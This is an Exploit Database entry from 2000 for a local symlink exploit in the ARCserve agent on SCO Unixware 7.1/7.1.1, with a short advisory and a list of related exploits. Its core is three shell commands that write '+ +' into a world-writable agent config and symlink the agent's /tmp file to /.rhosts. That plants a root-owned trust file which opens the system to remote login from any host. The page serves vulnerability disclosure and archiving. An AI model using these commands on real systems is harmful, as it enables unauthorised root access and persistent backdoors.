Exploit Database - Logo

SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit

EDB-ID: 19752 Author: Shawn Bracken Published: 2000-02-15
CVE: CVE-2000-0154... Type: Local Platform: SCO
Aliases: N/A Advisory/Source: Link Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp

Related Exploits

Trying to match CVEs (2): CVE-2000-0154, CVE-2000-0224
Trying to match OSVDBs (1): 7625
Other Possible E-DB Search Terms: SCO Unixware 7.1/7.1.1,  SCO Unixware 7.1,  SCO Unixware
Date D V Title Author
1999-11-03Download Exploit Code Verified HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - ExploitMastoras
1997-11-24Download Exploit Code Verified IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploitanonymous
1999-10-30Download Exploit Code Verified SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer OverflowK2
1999-11-25Download Exploit Code Verified SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer OverflowK2
1999-12-03Download Exploit Code Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink ExploitBrock Tellier
1998-12-02Download Exploit Code Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' ExploitBrock Tellier
1999-12-03Download Exploit Code Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer OverflowBrock Tellier
1999-12-10Download Exploit Code Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program DebuggingBrock Tellier
1999-12-03Download Exploit Code Verified SCO Unixware 7.1 - '/var/mail' PermissionsBrock Tellier
1999-12-03Download Exploit Code Verified SCO Unixware 7.1 - 'pkg' command ExploitBrock Tellier
1999-12-22Download Exploit Code Verified SCO Unixware 7.1 - i2odialogd Remote Buffer OverflowBrock Tellier
1999-12-06Download Exploit Code Verified SCO Unixware 7.1 pkgcat - Buffer OverflowBrock Tellier
1999-12-06Download Exploit Code Verified SCO Unixware 7.1 pkginstall - Buffer OverflowBrock Tellier
2006-02-26Download Exploit Code Verified SCO Unixware 7.1.3 - (ptrace) Privilege Escalationprdelka
2008-04-04Download Exploit Code Verified SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Privilege Escalationqaaz
2008-04-04Download Exploit Code Verified SCO UnixWare Merge - 'mcd' Privilege Escalationqaaz
2008-04-04Download Exploit Code Verified SCO UnixWare Reliant HA 1.1.4 - Privilege Escalationqaaz
1999-11-25Download Exploit Code Verified SCO Unixware 7.0 - xlock(1) (long 'Username') Buffer OverflowAK
Menu